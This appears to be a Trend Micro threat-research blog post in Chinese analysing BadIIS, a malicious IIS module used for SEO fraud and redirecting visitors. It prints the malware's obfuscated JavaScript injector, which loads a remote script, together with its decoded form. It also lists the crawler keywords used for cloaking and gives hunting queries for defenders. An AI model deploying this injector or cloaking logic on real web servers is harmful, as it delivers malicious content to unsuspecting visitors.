中文黑客组织利用BadIIS操纵SEO | Trend Micro (美国)

主要发现

趋势科技研究人员观察到一起SEO操纵活动，凸显了使用Internet Information Services (IIS)的组织需要主动更新和修补系统，以防止威胁行为者在其活动中使用BadIIS等恶意软件进行利用。

该活动很可能出于经济动机，因为将用户重定向到非法赌博网站表明攻击者部署BadIIS是为了获利。

此活动已经影响了亚洲国家，如印度、泰国和越南。但其影响可能超越地理边界。

活动概述

2024年，我们在亚洲观察到大量名为"BadIIS"的恶意软件分发。BadIIS针对Internet Information Services (IIS)，可用于SEO欺诈或向合法用户的浏览器注入恶意内容。这包括显示未经授权的广告、分发恶意软件，甚至针对特定群体进行水坑攻击。在此活动中，威胁行为者利用易受攻击的IIS服务器在受感染的服务器上安装BadIIS恶意软件。一旦用户向受感染的服务器发送请求，他们可能会收到攻击者篡改的内容。这可能导致两种潜在结果：

• 连接到非法赌博网站：修改的内容将用户重定向到涉及非法赌博活动的网站。
• 连接到恶意服务器：用户被重定向到攻击者控制的托管恶意内容（如恶意软件或网络钓鱼方案）的服务器。

基于文件普查和网络流量，我们确定了受影响地区，包括印度、泰国、越南、菲律宾、新加坡、台湾、韩国、日本和巴西。我们还观察到孟加拉国作为潜在目标。目标IIS服务器包括政府、大学、科技公司和电信部门拥有的机器。我们注意到受影响地区并不限于受感染机器的位置。在大多数情况下，受害者位于同一地区；然而，我们发现一些受害者在访问不同地区的受感染服务器时受到影响。

通过从样本中获取的信息（例如，提取的域、简体中文编写的字符串），我们认为这些变体很可能由中文群体制作和部署。

图1. 受害者分析

图2. 目标IIS服务器的地理分布

BadIIS安装

攻击者之一在成功利用IIS服务器后，使用包含以下命令的批处理文件安装BadIIS模块。以下是用于BadIIS安装的脚本：

图3. 用于IIS模块安装的脚本之一

SEO操纵方案中的关键功能和关键词

在分析此活动中使用的变体后，我们发现它们在功能和URL模式上与Group11先前使用的变体有相似之处，如Black Hat USA 2021演讲白皮书中所述。然而，新变体具有名为“OnSendResponse”的处理程序，而不是“OnBeginRequest”。

SEO欺诈模式

安装的BadIIS可以更改从Web服务器请求的HTTP响应头信息。它检查接收到的HTTP头中的“User-Agent”和“Referer”字段。如果这些字段包含特定的搜索门户网站或关键词，BadIIS会将用户重定向到与在线非法赌博网站相关的页面，而不是合法的网页。此功能旨在识别可能用于SEO欺诈的搜索引擎爬虫流量。

User-Agent字段中的关键词检查 360, baidu, bing, coccoc, daum, google, naver, sogou, yisou

Referer字段中的关键词检查 baidu.com, bing.com, Coccoc, daum.net, google, naver.com, so.com, sogou.com, sm.cn

图4. SEO欺诈模式的工作流程

注入器模式

在此模式下，安装的BadIIS将向合法访问者的请求的典型响应中注入可疑的JavaScript代码。因此，访问者将被重定向到恶意网站。

图5. 注入器模式的工作流程

以下混淆代码用于注入：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

<script type = "text/javascript"> eval(function(p, a, c, k, e, r) {
    e = function(c) {
        return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function(e) {
            return r[e]
        }];
        e = function() {
            return '\\w+'
        };
        c = 1
    };
    while (c--)
        if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('m(d(p,a,c,k,e,r){e=d(c){f c.n(a)};h(!\'\'.i(/^/,o)){j(c--)r[e(c)]=k[c]||e(c);k=[d(e){f r[e]}];e=d(){f\'\\\\w+\'};c=1};j(c--)h(k[c])p=p.i(q s(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);f p}(\'1["2"]["3"](\\\'<0 4="5/6" 7="8://9.a/b.c"></0>\\\');\',l,l,\'t|u|v|x|y|z|A|B|C|D|E|F|G\'.H(\'|\'),0,{}))', 44, 44, '|||||||||||||function||return||if|replace|while||13|eval|toString|String||new||RegExp|script|window|document||write|type|text|javascript|src|{js}|split'.split('|'), 0, {})) </script>

C&C URL使用单XOR密钥"0x03"加密，并在运行时解密。解码后的代码如下：

1

document.write(<script type="text/javascript" src={malicious URL}></script>)

结论与IIS安全的重要性

IIS是许多组织广泛采用的服务之一，其滥用可能导致严重后果。攻击者可以利用IIS漏洞向受感染网站的合法访问者提供恶意内容。在最近的活动中，新变体主要用于提供与在线赌博相关的内容。这种方法可以轻松适应大规模恶意软件分发和针对特定群体的水坑攻击。

因此，网站所有者面临重大风险，包括声誉损害、潜在法律后果和用户信任丧失，所有这些都由于其Web服务器缺乏安全性。为了减轻这些风险，IT经理应实施以下最佳实践：

• 识别可能易受攻击者攻击的资产，并确保定期检查最新安全补丁。
• 监控异常的IIS模块安装，特别关注位于不常见目录中的已安装映像。
• 限制对IIS服务器的管理访问，并为所有特权帐户强制执行强唯一密码和多因素认证（MFA）。
• 使用防火墙控制和监控进出IIS服务器的网络流量，限制对潜在威胁的暴露。
• 持续监控IIS服务器日志，以检测异常，如异常模块安装或服务器行为的意外变化。
• 通过禁用不必要的服务和功能确保安全配置，进一步最小化攻击面并加强整体服务器安全性。

Trend Vision One™

Trend Vision One™是一个企业网络安全平台，通过整合多种安全功能、增强对企业攻击面的控制，并提供对其网络风险状况的完全可见性，简化安全并帮助企业更快地检测和阻止威胁。该基于云的平台利用来自全球2.5亿个传感器和16个威胁研究中心的AI和威胁情报，在单一解决方案中提供全面的风险洞察、更早的威胁检测以及自动化的风险和威胁响应选项。

Trend Vision One威胁情报

为了领先于不断演变的威胁，Trend Vision One客户可以访问一系列情报报告和威胁洞察。威胁洞察帮助客户在网络威胁发生之前保持领先，并通过提供关于威胁行为者、其恶意活动及其技术的全面信息，使他们能够为新兴威胁做好准备。通过利用此情报，客户可以采取主动步骤保护其环境、减轻风险并有效响应威胁。

Trend Vision One情报报告应用 [IOC扫描] 中文黑客组织利用BadIIS操纵SEO

Trend Vision One威胁洞察应用 新兴威胁：中文黑客组织利用BadIIS操纵SEO

狩猎查询

Trend Vision One搜索应用 Trend Vision One客户可以使用搜索应用将本博客文章中提到的恶意指标与其环境中的数据匹配或狩猎。

BadIIS复制路径

1
2

eventSubId:105 AND (objectFilePath: "C:\ProgramData\Microsoft\DRM\HttpCgiModule.dll" OR objectFilePath: "C:\ProgramData\Microsoft\DRM\HttpFastCgiModule.dll")
objectCmd:"*install module /name:* /image:C:\\ProgramData\\Microsoft\\DRM\\*" OR processCmd:"*install module /name:* /image:C:\\ProgramData\\Microsoft\\DRM\\*"

更多狩猎查询可供具有威胁洞察权限的Trend Vision One客户使用。

危害指标（IOC）

此条目的危害指标可在此处找到。

标签

恶意软件 | 网络 | 研究 | 文章, 新闻, 报告

作者

Ted Lee
威胁研究员

Lenart Bermejo
威胁分析师